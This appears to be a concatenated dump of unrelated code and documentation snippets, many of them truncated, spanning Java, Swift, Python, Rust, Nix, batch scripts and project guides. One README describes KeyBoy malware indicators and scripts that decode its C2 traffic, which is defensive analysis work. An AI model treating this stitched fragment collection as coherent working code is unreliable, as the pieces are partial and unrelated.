org.knowm.xchange.client.ExchangeRestProxyBuilder;\nimport org.knowm.xchange.therock.TheRock;\nimport org.knowm.xchange.therock.dto.TheRockException;\nimport org.knowm.xchange.therock.dto.marketdata.TheRockOrderBook;\nimport org.knowm.xchange.therock.dto.marketdata.TheRockTicker;\nimport org.knowm.xchange.therock.dto.marketdata.TheRockTrades;\n\npublic class TheRockMarketDataServiceRaw extends TheRockBaseService {\n\n private final TheRock theRock;\n\n public TheRockMarketDataServiceRaw(Exchange exchange) {\n super(exchange);\n this.theRock =\n ExchangeRestProxyBuilder.forInterface(TheRock.class, exchange.getExchangeSpecification())\n .build();\n }\n\n public TheRockTicker getTheRockTicker(TheRock.Pair currencyPair)\n throws TheRockException, IOException {\n return theRock.getTicker(currencyPair);\n }\n\n public TheRockOrderBook getTheRockOrderBook(TheRock.Pair currencyPair)\n throws TheRockException, IOException {\n return theRock.getOrderbook(currencyPair);\n }\n\n public TheRockTrades getTheRockTrades(TheRock.Pair currencyPair, Object[] args)\n throws IOException {\n Date after = null;\n if (args.length == 1) {\n Object arg = args[0];\n if (arg instanceof Number) {\n after = new Date(((Number) arg).longValue() * 1000);\n } else if (arg instanceof Date) {\n after = (Date) arg;\n }\n }\n return theRock.getTrades(currencyPair, after);\n }\n}" +"import Foundation\n\n\n// MARK: - NotificationReplyStore\n//\nclass NotificationReplyStore {\n\n /// Shared Instance.\n ///\n static let shared = NotificationReplyStore()\n\n /// Unit Testing Helper: Allows us to hack the current date.\n ///\n private var overridenNow: Date?\n\n /// Our beautiful and private Initializer. In here we'll trigger the cleanup sequence, which removes outdated replies!.\n ///\n private init() {\n purgeOldReplies()\n }\n\n /// Unit Testing Helper: Allows us to hack the current date.\n ///\n init(now: Date) {\n overridenNow = now\n purgeOldReplies(now: now)\n }\n\n\n /// Retrieves the cached reply, for the specified notificationID (if any).\n ///\n func loadReply(for notificationID: String) -> String? {\n return replies[notificationID]\n }\n\n /// Stores a given reply, for the specified notificationID.\n ///\n func store(reply: String, for notificationID: String) {\n replies[notificationID] = reply\n timestamps[notificationID] = overridenNow?.normalizedDate() ?? Date().normalizedDate()\n }\n\n /// Meant for unit testing purposes. Effectively nukes the cached replies.\n ///\n func reset() {\n replies = [:]\n timestamps = [:]\n }\n}\n\n\n// MARK: - Private Methods\n//\nprivate extension NotificationReplyStore {\n\n /// Nukes entries older than `Settings.timeToLiveInDays`.\n ///\n func purgeOldReplies(now: Date = Date()) {\n guard let expiredKeys = findExpiredKeys(inRelationTo: now) else {\n return\n }\n\n removeEntries(with: expiredKeys)\n }\n\n /// Returns the collection of expired keys, when compared to the specified Date.\n ///" +"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nDOCUMENTATION = '''\n---\nmodule: keystone_service\nshort_description: Manage OpenStack Identity (keystone) service endpoints\noptions:\n name:\n description:\n - name of service (e.g., keystone)\n required: yes\n type:\n description:\n - type of service (e.g., identity)\n required: yes\n description:\n description:\n - description of service (e.g., Identity Service)\n required: yes\n public_url:\n description:\n - public url of service.\n - 'Alias: I(url)'\n - 'Alias: I(publicurl)'\n required: yes\n internal_url:\n description:\n - internal url of service.\n - 'Alias: I(internalurl)'\n required: no\n default: value of public_url\n admin_url:\n description:\n - admin url of service.\n - 'Alias: I(adminurl)'\n required: no\n default: value of public_url\n insecure:\n description:\n - allow use of self-signed SSL certificates\n required: no\n choices: [ \"yes\", \"no\" ]\n default: no\n region:\n description:\n - region of service\n required: no\n default: RegionOne\n ignore_other_regions:\n description:\n - allow endpoint to exist in other regions\n required: no\n choices: [ \"yes\", \"no\" ]\n default: no\n state:\n description:\n - Indicate desired state of the resource\n choices: ['present', 'absent']\n default: present\n\n\n\nrequirements: [ python-keystoneclient ]\nauthor: Lorin Hochstein\n'''\n\nEXAMPLES = '''\nexamples:\nkeystone_service: >\n name=keystone\n type=identity\n description=\"Keystone Identity Service\"\n publicurl=http://192.168.206.130:5000/v2.0\n internalurl=http://192.168.206.130:5000/v2.0\n adminurl=http://192.168.206.130:35357/v2.0\n\nkeystone_service: >\n name=glance\n type=image\n description=\"Glance Identity Service\"\n url=http://192.168.206.130:9292\n\n'''\n\ntry:\n from keystoneclient.v2_0 import client\nexcept ImportError:\n keystoneclient_found = False" +"// entity 0\n{\n\"classname\" \"worldspawn\"\n// brush 0\n{\n( 0 8 576 ) ( 0 264 576 ) ( 256 8 576 ) tex_buildings/concrete001 0 0 0 0.25 0.25 32768 0 0\n( 480 384 512 ) ( 480 544 512 ) ( 352 384 512 ) tex_common/nodraw 0 0 0 0.25 0.25 32768 0 0\n( 0 0 0 ) ( 0 0 64 ) ( 256 0 0 ) tex_buildings/wall019 0 0 0 0.25 0.25 32768 0 0\n( 0 0 0 ) ( 0 256 0 ) ( 0 0 64 ) tex_buildings/wall019 0 0 0 0.25 0.25 32768 0 0\n( 256 256 64 ) ( 256 256 0 ) ( 256 0 64 ) tex_buildings/wall019 0 0 0 0.25 0.25 32768 0 0\n( 256 256 64 ) ( 0 256 64 ) ( 256 256 0 ) tex_buildings/wall019 0 0 0 0.25 0.25 32768 0 0\n}\n// brush 1\n{\n( -256 2816 192 ) ( 1792 2816 192 ) ( -256 256 192 ) tex_buildings/concrete001 0 0 0 0.25 0.25 65024 0 0\n( 480 384 64 ) ( 480 544 64 ) ( 352 384 64 ) tex_common/nodraw 0" +"import React from 'react'\nimport Highlight from 'react-highlight'\n\nimport InViewMonitor from '../../../src/'\nimport Video from './Video'\n\nconst AutoplayExample = () => (\n <div>\n <h2 className=\"mb1\">Autoplay video when in view</h2>\n <p className=\"mb2\">\n Given a Video component that can be started by changing a{' '}\n <code>isPlaying</code> prop, an autoplaying video via scroll is trivial.\n the <code>toggleChildPropsOnInView</code> prop allows us to stop it again\n as soon as it goes out of view, saving CPU and increasing battery life for\n mobile devices! \ud83d\udcaa\n </p>\n\n <div className=\"left-align mb4\">\n <Highlight className=\"javascript\">\n {`\nreturn (\n <InViewMonitor\n childPropsInView={{isPlaying: true}}\n toggleChildPropsOnInView={true}\n intoViewMargin='-100px' // large value just to demonstrate that it starts/stops\n >\n <Video src={videoSrc} />\n </InViewMonitor>\n)`}\n </Highlight>\n </div>\n\n <div>\n <InViewMonitor\n childPropsInView={{ isPlaying: true }}\n toggleChildPropsOnInView={true}\n intoViewMargin=\"-100px\"\n >\n <Video src=\"./birds.mp4\" />\n </InViewMonitor>\n </div>\n </div>\n)\n\nexport default AutoplayExample" +"{-# LANGUAGE GADTs, TypeSynonymInstances, FlexibleInstances #-}\nmodule Main where\n\n-- imports {{{1\nimport Control.Applicative ((<$>), (<*>))\nimport Data.Maybe (fromMaybe)\nimport Text.Printf (printf)\n\nimport Compiler.Hoopl hiding ((<*>))\n\nimport qualified Compiler.Hoopl as H\nimport qualified Data.Set as S\n\n-- nodes {{{1\ntype Variable = String\ntype Value = Int\n\ndata Expr =\n ExVar Variable\n | ExConst Value\n | ExOp Expr Operation Expr\n | ExCall String [Expr]\n\ndata Operation =\n Plus | Minus | Equals\n\ndata Node e x where\n Lbl :: Label -> Node C O\n Assign :: Variable -> Expr -> Node O O\n Stmt :: Expr -> Node O O\n Branch :: Label -> Node O C\n Cond :: Expr -> Label -> Label -> Node O C\n Return :: Node O C\n\ninstance NonLocal Node where\n entryLabel (Lbl l) = l\n successors (Branch l) = [l]\n successors (Cond _ l1 l2) = [l1, l2]\n successors Return = []\n\n-- printing {{{1\ninstance Show Operation where\n show Plus = \"+\"\n show Minus = \"-\"\n show Equals = \"==\"\n\ninstance Show Expr where\n showsPrec _ (ExVar v) = showString v\n showsPrec _ (ExConst v) = shows v\n showsPrec _ (ExOp lhs op rhs) =\n showChar '('\n . shows lhs\n . showChar" +"package com.jcloisterzone.board;\n\nimport java.io.Serializable;\nimport java.util.function.Function;\nimport java.util.function.Predicate;\n\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport com.jcloisterzone.Immutable;\nimport com.jcloisterzone.game.RandomGenerator;\n\nimport io.vavr.Tuple2;\nimport io.vavr.collection.HashMap;\nimport io.vavr.collection.LinkedHashMap;\nimport io.vavr.collection.Map;\nimport io.vavr.collection.Stream;\nimport io.vavr.collection.Vector;\nimport io.vavr.control.Option;\n\n/**\n * Represents a stack of tiles that can be drawn. It handles active/unactivated tiles and only draws from active ones.\n */\n@Immutable\npublic class TilePack implements Serializable {\n\n private static final long serialVersionUID = 1L;\n\n /**\n * The logger.\n */\n protected final transient Logger logger = LoggerFactory.getLogger(getClass());\n\n private final LinkedHashMap<String, TileGroup> groups;\n\n private final int hiddenUnderHills;\n\n /**\n * Instantiates a new {@code TilePack}.\n *\n * @param groups the groups making up this pack\n */\n public TilePack(LinkedHashMap<String, TileGroup> groups, int hiddenUnderHills) {\n this.groups = groups;\n this.hiddenUnderHills = hiddenUnderHills;\n }\n\n /**\n * Gets the groups making up this pack.\n *\n * @return the groups making up this pack\n */\n public LinkedHashMap<String, TileGroup> getGroups() {\n return groups;\n }\n\n /**\n * Gets number of tiles secretly put face-down under the hill\n *\n * @return number of tiles\n */\n public int getHiddenUnderHills() {\n return hiddenUnderHills;\n }\n\n /**\n * Sets the groups making up this pack.\n *\n * @param groups the groups\n * @return a new instance with the groups set\n */\n public TilePack setGroups(LinkedHashMap<String," +"---\nlayout: index\ntitle: Move an object in a direction\n---\n\n\nOccasionally you might want to have the player move an object from one room to another by pushing or pulling it, rather than carrying it. Let us suppose there is a heavy crate; the player cannot lift it, but she could push it into the room to the west, then climb up it to get to a trapdoor in the ceiling.\n\nBasic Command\n-------------\n\nThis is pretty easy to do in its simplest form. We need a new command, with this pattern:\n\n> push #object# #exit#\n\nThe script will only run if both the object and exit have a match, so all the script has to do is move the object to the destination of the exit (which is set in its \"to\" attribute), and tell the player:\n\n```\nmsg (\"You push \" + object.article + \" \" + exit.alias + \".\")\nobject.parent = exit.to\n```\n\nYou might also want the player to end up in the other room - I am not sure what the player would expect. If so, then just add an extra line.\n\n```\nmsg (\"You push \" + object.article + \" \" + exit.alias" +"from dino.hooks.ban import *\nfrom dino.hooks.connect import *\nfrom dino.hooks.create import *\nfrom dino.hooks.delete import *\nfrom dino.hooks.disconnect import *\nfrom dino.hooks.get_acl import *\nfrom dino.hooks.history import *\nfrom dino.hooks.invite import *\nfrom dino.hooks.join import *\nfrom dino.hooks.kick import *\nfrom dino.hooks.leave import *\nfrom dino.hooks.list_channels import *\nfrom dino.hooks.list_rooms import *\nfrom dino.hooks.login import *\nfrom dino.hooks.message import *\nfrom dino.hooks.remove_room import *\nfrom dino.hooks.request_admin import *\nfrom dino.hooks.set_acl import *\nfrom dino.hooks.status import *\nfrom dino.hooks.startup import *\nfrom dino.hooks.users_in_room import *\nfrom dino.hooks.whisper import *\nfrom dino.hooks.update_user_info import *\nfrom dino.hooks.read import *\nfrom dino.hooks.received import *\nfrom dino.hooks.heartbeat import *" +"import { Directive, ElementRef, Input, OnInit, Optional } from '@angular/core';\nimport { Observable, of, Subject } from 'rxjs';\nimport {\n filter,\n map,\n mergeAll,\n switchMap,\n tap,\n withLatestFrom,\n} from 'rxjs/operators';\nimport { getZoneUnPatchedApi } from '../../core';\nimport { LetDirective } from '../../let';\n\n/**\n *\n * @description\n *\n * This function takes an elem and event and re-applies the listeners from the passed event to the\n * passed element with the zone un-patched version of it.\n *\n * @param elem {HTMLElement} - The elem to re-apply the listeners to.\n * @param event {string} - The name of the event from which to re-apply the listeners.\n *\n * @returns void\n */\nfunction unpatchEventListener(elem: HTMLElement, event: string): void {\n const eventListeners = (elem as any).eventListeners(event);\n // Return if no event listeners are present\n if (!eventListeners) {\n return;\n }\n\n const addEventListener = getZoneUnPatchedApi('addEventListener', elem).bind(\n elem\n );\n eventListeners.forEach((listener) => {\n // Remove and reapply listeners with patched API\n elem.removeEventListener(event, listener);\n // Reapply listeners with un-patched API\n addEventListener(event, listener);\n });\n}\n\nfunction intersectionObserver(\n options?: object\n): {\n observe: (target: Element) => void;\n unobserve: (target: Element) => void;\n entries$: Observable<any>;\n} {\n const subject = new Subject();\n const observer = observerSupported()\n ? new IntersectionObserver((entries) => {\n entries.forEach((entry) =>" +"{ lib\n, python3Packages\n, fetchFromBitbucket\n, fetchpatch\n}:\n\npython3Packages.buildPythonApplication rec {\n pname = \"flatcam\";\n version = \"8.5\";\n\n src = fetchFromBitbucket {\n owner = \"jpcgt\";\n repo = \"${pname}\";\n rev = \"533afd6a1772857cb633c011b5e0a15b60b1e92e\"; # 8.5 with Red Hat packaging.\n sha256 = \"199kiiml18k34z1zhk2hbhibphmnv0kb11kxiajq52alps0mjb3m\";\n };\n\n propagatedBuildInputs = with python3Packages; [\n matplotlib\n numpy\n pyqt4\n Rtree\n scipy\n setuptools\n shapely\n simplejson\n six\n svg-path\n ];\n\n packaging_fix_pull_request_patch = fetchpatch {\n name = \"packaging_fix_pull_request.patch\";\n url = \"https://bitbucket.org/trepetti/flatcam/commits/5591ed889d1f48a5190fe237b562cb932cb5876c/raw\";\n sha256 = \"19rhjdrf1n1q29cgpcry6pl2kl90zq0d613hhkwdir9bhq5bkknp\";\n };\n\n patches = [\n packaging_fix_pull_request_patch\n ./release.patch\n ];\n\n # Only non-GUI tests can be run deterministically in the Nix build environment.\n checkPhase = ''\n python -m unittest tests.test_excellon\n python -m unittest tests.test_gerber_buffer\n python -m unittest tests.test_paint\n python -m unittest tests.test_pathconnect\n '';\n\n meta = with lib; {\n description = \"2-D post processing for PCB fabrication on CNC routers.\";\n homepage = \"https://bitbucket.org/jpcgt/flatcam\";\n license = licenses.mit;\n maintainers = with maintainers; [ trepetti ];\n };\n}" +"# IdentityManager\r\n\r\n[IdentityManager](https://github.com/identitymanager)\r\nis a tool for developers and/or administrators to manage the identity\r\ninformation for users of their applications in ASP.NET Core. This includes \r\ncreating users, editing user information (passwords, email, claims, etc.) \r\nand deleting users. It provides a modern replacement for the ASP.NET WebSite\r\nAdministration tool that used to be built into Visual Studio.\r\n\r\n# Project Details\r\n\r\n* [Project Info Site](https://github.com/IdentityManager/IdentityManager2)\r\n* [Project Code Site](https://github.com/IdentityManager/IdentityManager2)\r\n* Project License Type: [Apache License 2.0 (Apache)](https://github.com/IdentityManager/IdentityManager2/blob/master/LICENSE)\r\n* Project Main Contact:\u00a0[Scott Brady](https://github.com/scottbrady91)\r\n\r\n### Quicklinks\r\n\r\n* [Documentation](https://github.com/IdentityManager/IdentityManager/wiki)\r\n* [Contribute](https://github.com/IdentityManager/IdentityManager2/blob/master/CONTRIBUTING.md)\r\n* [Rock Solid Knowledge](https://rocksolidknowledge.com) \r\n* [Scott's blog](https://www.scottbrady91.com) \r\n* [Brock's blog](https://brockallen.com/)\r\n* [Chat](https://gitter.im/IdentityManager/IdentityManager)\r\n* Twitter: [@rskltd](https://twitter.com/rskltd) & \r\n[@scottbrady91](https://twitter.com/scottbrady91) & \r\n[@brocklallen](https://twitter.com/brocklallen)" +"# Demonstrate GCP IAM authentication method\n\nThis guide will demonstrate Vault's GCP IAM authentication method:\n\n> 1. The client generates a signed JWT using the IAM projects.serviceAccounts.signJwt method. For examples of how to do this, see the Obtaining JWT Tokens section.\n> 1. The client sends this signed JWT to Vault along with a role name.\n> 1. Vault extracts the kid header value, which contains the ID of the key-pair used to generate the JWT, and the sub ID/email to find the service account key. If the service account does not exist or the key is not linked to the service account, Vault denies authentication.\n> 1. Vault authorizes the confirmed service account against the given role. If that is successful, a Vault token with the proper policies is returned.\n> https://www.vaultproject.io/docs/auth/gcp.html#iam-login\n\n<img src=\"https://raw.githubusercontent.com/hashicorp/vault-guides/master/assets/vault_gcp_iam_arch.png\" alt=\"GCP IAM authentication\" width=\"400\">\n\n## Background\n\nThe project will create the following resources in GCP:\n\n* vault-gcp-iam-demo-[abc] - A project with a random generated name to assosiate all the resources to\n* vaultadmin - A Service Account with the iam.serviceAccountKeyAdmin - Vault will use this to check other service account credentials\n* alice-account - A Service Account bound to the backend\n* bob-account - A" +"//! Standard return type for invoking operations, returning success or an error\n//! code.\n//!\n//! - Author: Philip Levis <pal@cs.stanford.edu>\n//! - Date: Dec 22, 2016\n\n/// Standard return errors in Tock.\n#[derive(Clone, Copy, Debug, PartialEq)]\npub enum ReturnCode {\n /// Success value must be positive\n SuccessWithValue { value: usize },\n /// Operation completed successfully\n SUCCESS,\n /// Generic failure condition\n FAIL,\n /// Underlying system is busy; retry\n EBUSY,\n /// The state requested is already set\n EALREADY,\n /// The component is powered down\n EOFF,\n /// Reservation required before use\n ERESERVE,\n /// An invalid parameter was passed\n EINVAL,\n /// Parameter passed was too large\n ESIZE,\n /// Operation canceled by a call\n ECANCEL,\n /// Memory required not available\n ENOMEM,\n /// Operation or command is unsupported\n ENOSUPPORT,\n /// Device does not exist\n ENODEVICE,\n /// Device is not physically installed\n EUNINSTALLED,\n /// Packet transmission not acknowledged\n ENOACK,\n}\n\nimpl From<ReturnCode> for isize {\n fn from(original: ReturnCode) -> isize {\n match original {\n ReturnCode::SuccessWithValue { value } => value as isize,\n ReturnCode::SUCCESS => 0,\n ReturnCode::FAIL => -1,\n ReturnCode::EBUSY => -2,\n ReturnCode::EALREADY => -3,\n ReturnCode::EOFF => -4,\n ReturnCode::ERESERVE => -5,\n ReturnCode::EINVAL => -6,\n ReturnCode::ESIZE => -7,\n ReturnCode::ECANCEL => -8,\n ReturnCode::ENOMEM => -9,\n ReturnCode::ENOSUPPORT => -10,\n ReturnCode::ENODEVICE" +"using System;\n\nusing UIKit;\nusing Foundation;\n\nnamespace CloudKitAtlas\n{\n\tpublic partial class LoadingViewController : UIViewController\n\t{\n\t\t[Outlet]\n\t\tpublic UIActivityIndicatorView ActivityIndicator { get; set; }\n\n\t\tpublic Results Results { get; set; } = new Results ();\n\t\tpublic CodeSample CodeSample { get; set; }\n\t\tpublic NSError Error { get; set; }\n\n\t\tpublic LoadingViewController (IntPtr handle)\n\t\t\t: base (handle)\n\t\t{\n\t\t}\n\n\t\t[Export (\"initWithCoder:\")]\n\t\tpublic LoadingViewController (NSCoder coder)\n\t\t\t: base (coder)\n\t\t{\n\t\t}\n\n\t\tpublic override void ViewDidLoad ()\n\t\t{\n\t\t\tbase.ViewDidLoad ();\n\t\t\tActivityIndicator.StartAnimating ();\n\t\t}\n\n\t\tpublic override void PrepareForSegue (UIStoryboardSegue segue, NSObject sender)\n\t\t{\n\t\t\tvar spinner = ActivityIndicator;\n\t\t\tif (spinner != null)\n\t\t\t\tspinner.StopAnimating ();\n\n\t\t\tif (segue.Identifier == \"ShowResult\") {\n\t\t\t\tvar resultsViewController = segue.DestinationViewController as ResultsViewController;\n\t\t\t\tif (resultsViewController != null) {\n\t\t\t\t\tresultsViewController.CodeSample = CodeSample;\n\t\t\t\t\tresultsViewController.Results = (Results.Items.Count > 0) ? Results : new Results (new IResult [] { new NoResults () });\n\t\t\t\t}\n\t\t\t} else if (segue.Identifier == \"ShowError\") {\n\t\t\t\tvar errorViewController = segue.DestinationViewController as ErrorViewController;\n\t\t\t\tif (errorViewController != null)\n\t\t\t\t\terrorViewController.Error = Error;\n\t\t\t}\n\t\t}\n\t}\n}" +"# Change Log\nAll notable changes to this project will be documented in this file.\nThis project adheres to [Semantic Versioning](http://semver.org/).\n\n## [2.0.0] - 2020-03-25\n### Breaking\n- Drop support for node < 10.\n\n## [1.1.0] - 2018-06-06\n### Added\n- Support using a strategy which overrides the `getOAuthAccessToken` function, for example the Reddit or Spotify strategy. #10\n\n## [1.0.0] - 2015-12-17\n### Added\n- Allow extra params to be sent when requesting access token.\n- Use embedded `_oauth2` constructor to create new OAuth2 instance, to support instances where the `_oauth2` object is using a custom implementation.\n\n### Removed\n- Dropped peerDependency on `oauth2` library, in favour of using the `_oauth2` object exposed by passport.\n- Dropped support for node.js 0.6 and 0.8, lowest supported version is now 0.10. _If you still need support for 0.6 or 0.8, please continue to use v0.4.0 of this module._\n\n### Upgrading from 0.4\n\nThe move from 0.4 to 1.0 is non-breaking, _unless_ you are using a version of node.js lower than 0.10. In this case, you should stick to using 0.4. Otherwise, you can safely upgrade with no code changes required.\n\n## [0.4.0] - 2015-04-01\n### Added\n- Allow strategy to be added" +"use crate::{\n emulator::heap::THeap,\n fail::RtResult,\n term::{boxed, *},\n};\n\n/// Helper allows allocating a tuple and setting its elements.\npub struct TupleBuilder {\n tuple_ptr: *mut boxed::Tuple,\n}\n\nimpl TupleBuilder {\n #[inline]\n pub fn with_arity(arity: usize, hp: &mut THeap) -> RtResult<Self> {\n let new_tuple = boxed::Tuple::create_into(hp, arity)?;\n Ok(Self::new(new_tuple))\n }\n\n #[inline]\n pub fn new(p: *mut boxed::Tuple) -> Self {\n Self { tuple_ptr: p }\n }\n\n #[inline]\n pub unsafe fn set_element(&self, i: usize, val: Term) {\n (*self.tuple_ptr).set_element(i, val)\n }\n\n #[inline]\n pub fn make_term(&self) -> Term {\n Term::make_boxed(self.tuple_ptr)\n }\n}\n\n/// Create a 2-tuple.\n#[inline]\npub fn tuple2(hp: &mut THeap, a: Term, b: Term) -> RtResult<Term> {\n let tb = TupleBuilder::with_arity(2, hp)?;\n unsafe {\n tb.set_element(0, a);\n tb.set_element(1, b);\n }\n Ok(tb.make_term())\n}" +"## KeyBoy IOCs\n\nThis directory contains IOCs from the Citizen Lab report [It\u2019s Parliamentary: KeyBoy and the targeting of the Tibetan Community](https://citizenlab.org/2016/11/parliament-keyboy/) published the 17th of November 2016.\n\nFiles included in this directory:\n* openioc.ioc : IOCs in OpenIOC format\n* stix.xml : IOCs in STIX XML format\n* iocs.csv : IOCs in csv format\n* keyboy.yar : Yara rules related to the KeyBoy samples identified\n* kb_c2Decode.py : script to decode KeyBoy C2 communications (see help hereafter)\n* kb_configDecode.py : script to decode KeyBoy configuration (see help hereafter)\n\n\n### kb_c2Decode.py\n\nHelp:\n```bash\n$ python kb_c2Decode.py -h\nusage: kb_c2Decode.py [-h] (-k KEY | -b BINARY) [--verbose] PCAPF\n\nDecode KeyBoy C2 traffic from pcap file\n\npositional arguments:\n PCAPF PCAP File containing c2 traffic\n\noptional arguments:\n -h, --help show this help message and exit\n -k KEY, --key KEY Manually provide C2 decode key\n -b BINARY, --binary BINARY\n KeyBoy binary\n --verbose, -v Enable verbose output\n\n```\n\nExample:\n```\n$ python kb_c2Decode.py -b wab32res.dll dump.pcap\n============================\n{KeyBoy C2 Traffic decoder}\n============================\n\nFound constant: 0x71\nComputing decode value...\nFound decoding multiplier (inverse): 0x91\nSearching PCAP for RAW TCP packets and decoding...\n\n*a*\nHOME-PC\n192.168.100.103\nMyUser\n2016/06/03 00:24:20\n20151108\n```\n\n\n### kb_configDecode.py\n\nHelp:\n```\n$ python" +"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nA pure-Python module for identifying and examining RAR files developed without\nany exposure to the original unrar code. (Just format docs from wotsit.org)\n\nIt was, however, influenced by the zipfile module in the Python standard\nlibrary as, having already decided to match the zipfile.ZipFile API as closely\nas feasibly possible, I didn't see a point to doing extra work to come up with\nnew ways of laying out my code for no good reason.\n\n@todo: Determine how rarfile (http://rarfile.berlios.de/) compares to this in\nvarious target metrics. If it is superior or close enough on all fronts,\npatch it as necessary and plan a migration path. Otherwise, do the following:\n - Complete the parsing of the RAR metadata.\n (eg. Get data from archive header, check CRCs, read cleartext comments, etc.)\n - Optimize further and write a test suite.\n - Double-check that ZipFile/ZipInfo API compatibility has been maintained\n wherever feasible.\n - Support extraction of files stored with no compression.\n - Look into supporting split and password-protected RARs.\n - Some password-protected RAR files use blocks with types 0x30, 0x60, and 0xAD\n according to this code. Figure out whether it's a bug or whether they're really" +"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport hashlib, subprocess, os\n\n\nclass RawNotFound(FileNotFoundError):\n pass\n\n\ndef generate_thumbnail(raw_filepath, cache_dir):\n \"\"\"Generates a thumbnail for the given image. The thumbnail is written into\n the cache dir, given by ``cache_root`` in the INI file. This is a helper\n routine for `tag_image_files` in order to make the thumbnail generation\n parallel.\n\n :param str raw_filepath: filepath of the RAW image file\n :param str cache_dir: root path of the thumbnail cache\n \"\"\"\n hash_ = hashlib.sha1()\n hash_.update(raw_filepath.encode(\"utf-8\"))\n out_filepath = os.path.join(cache_dir, hash_.hexdigest() + \".jpeg\")\n try:\n os.mkdir(cache_dir)\n except FileExistsError:\n pass\n processes = []\n if os.path.splitext(raw_filepath)[1].lower() in [\".tif\", \".tiff\", \".jpeg\", \".jpg\"]:\n processes.append(subprocess.Popen([\"convert\", raw_filepath, \"-resize\", \"131072@\", out_filepath]))\n else:\n dcraw = subprocess.Popen([\"dcraw\", \"-h\", \"-T\", \"-c\", raw_filepath], stdout=subprocess.PIPE)\n processes.append(dcraw)\n processes.append(subprocess.Popen([\"convert\", \"-\", \"-resize\", \"131072@\", out_filepath], stdin=dcraw.stdout))\n return_codes = [process.wait() for process in processes]\n if any(code != 0 for code in return_codes):\n raise RawNotFound" +"if \"x%~3\"==\"x\" goto :EOF\r\nif not \"x%~4\"==\"x\" set %~4=\r\n\r\ncall WB_LOG \"[%WB_PROJECT%] --- MOUNT [%~1:%2] -%%gt:%% [%~3]\"\r\n\r\nrem remove uncompleted mounted folder first.\r\nif \"x%USE_WIMLIB%\"==\"x1\" (\r\n if exist \"%~3\" rd /s /q \"%~3\"\r\n)\r\n\r\nset chk_file=\r\nif exist \"%~3\" (\r\n for /f \"delims=\" %%i in ('dir /b \"%~3\"') do (\r\n set \"chk_file=%%i\"\r\n )\r\n) else (\r\n set chk_file=skip\r\n)\r\n\r\nrem remove empty mounted folder\r\nif \"x%chk_file%\"==\"x\" (\r\n rd /s /q \"%~3\"\r\n)\r\nset chk_file=\r\n\r\nif not exist \"%~3\" mkdir \"%~3\"\r\n\r\nif \"x%USE_WIMLIB%\"==\"x1\" (\r\n wimlib-imagex.exe extract \"%~1\" %2 --dest-dir=\"%~3\" --no-acls --nullglob\r\n) else (\r\n call DismX /mount-wim /wimfile:\"%~1\" /index:%2 /mountdir:\"%~3\"\r\n)\r\nif \"x%~4\"==\"x\" goto :EOF\r\nif \"%errorlevel%\"==\"0\" set %~4=1" +"import logging\nimport math\nimport tkinter as tk\nfrom typing import TYPE_CHECKING, Optional, Tuple\n\nfrom core.api.grpc.wrappers import Interface, Link\nfrom core.gui import themes\nfrom core.gui.dialogs.linkconfig import LinkConfigurationDialog\nfrom core.gui.frames.link import EdgeInfoFrame, WirelessEdgeInfoFrame\nfrom core.gui.graph import tags\nfrom core.gui.nodeutils import NodeUtils\nfrom core.gui.utils import bandwidth_text, delay_jitter_text\n\nif TYPE_CHECKING:\n from core.gui.graph.graph import CanvasGraph\n\nTEXT_DISTANCE: float = 0.30\nEDGE_WIDTH: int = 3\nEDGE_COLOR: str = \"#ff0000\"\nWIRELESS_WIDTH: float = 3\nWIRELESS_COLOR: str = \"#009933\"\nARC_DISTANCE: int = 50\n\n\ndef create_edge_token(src: int, dst: int, network: int = None) -> Tuple[int, ...]:\n values = [src, dst]\n if network is not None:\n values.append(network)\n return tuple(sorted(values))\n\n\ndef arc_edges(edges) -> None:\n if not edges:\n return\n mid_index = len(edges) // 2\n if mid_index == 0:\n arc_step = ARC_DISTANCE\n else:\n arc_step = ARC_DISTANCE / mid_index\n # below edges\n arc = 0\n for edge in edges[:mid_index]:\n arc -= arc_step\n edge.arc = arc\n edge.redraw()\n # mid edge\n if len(edges) % 2 != 0:\n arc = 0\n edge = edges[mid_index]\n edge.arc = arc\n edge.redraw()\n mid_index += 1\n # above edges\n arc = 0\n for edge in edges[mid_index:]:\n arc += arc_step\n edge.arc = arc\n edge.redraw()\n\n\nclass Edge:\n tag: str = tags.EDGE\n\n def __init__(self, canvas: \"CanvasGraph\", src: int, dst: int = None) -> None:\n self.canvas" +"#!perl -T\n\nuse strict;\nuse warnings;\n\nuse Test::More tests => 5;\n\nuse App::Ack::Filter;\n\nmy $filter;\n\n$filter = eval {\n App::Ack::Filter->create_filter('test');\n};\n\nok( !$filter, 'Creating an unknown filter should fail' );\nlike( $@, qr/unknown filter/i, 'Got the expected error' );\n\nApp::Ack::Filter->register_filter(test => 'TestFilter');\n\n$filter = eval {\n App::Ack::Filter->create_filter('test', qw/foo bar/);\n};\n\nok( $filter, 'Creating a registered filter should succeed' ) or diag($@);\nisa_ok( $filter, 'TestFilter', 'Creating a test filter should be a TestFilter' );\nis_deeply( $filter, [qw/foo bar/], 'Extra arguments should get passed through to constructor' );\n\n\npackage TestFilter;\n\nuse strict;\nuse warnings;\n\nsub new {\n my ( $class, @args ) = @_;\n\n return bless \\@args, $class;\n}\n\n1;" +"## 0x Contribution Guide\n\nWe welcome contributions from anyone on the internet and are grateful for even the smallest contributions. This document will help get you setup to start contributing back to 0x.\n\n### Getting started\n\n1. Fork `0xproject/0x-monorepo`\n2. Clone your fork\n3. Follow the [installation & build steps](https://github.com/0xProject/0x-monorepo#install-dependencies) in the repo's top-level README.\n4. Setup the recommended [Development Tooling](#development-tooling).\n5. Open a PR with the `[WIP]` flag against the `development` branch and describe the change you are intending to undertake in the PR description. (see [our branch naming conventions](#branch-structure))\n\nBefore removing the `[WIP]` tag and submitting the PR for review, make sure:\n\n- It passes our linter checks (`yarn lint`)\n- It is properly formatted with Prettier (`yarn prettier`)\n- It passes our continuous integration tests (See: [Enabling code coverage checks on your fork](#enabling-code-coverage-checks-on-your-fork) for instructions on getting the `submit-coverage` test to pass on forks)\n- You've created/updated the corresponding [CHANGELOG](#CHANGELOGs) entries.\n- Your changes have sufficient test coverage (e.g regression tests have been added for bug fixes)\n\n### Branch structure\n\nWe have two main branches:\n\n- `master` represents the most recently released (published on npm) version of the codebase.\n- `development` represents the current development state of" +"# Submit an issue\n\nNote that any underlying issues with the content shared in this repository can only be addressed by the original owner and should be reported directly. Please only create an 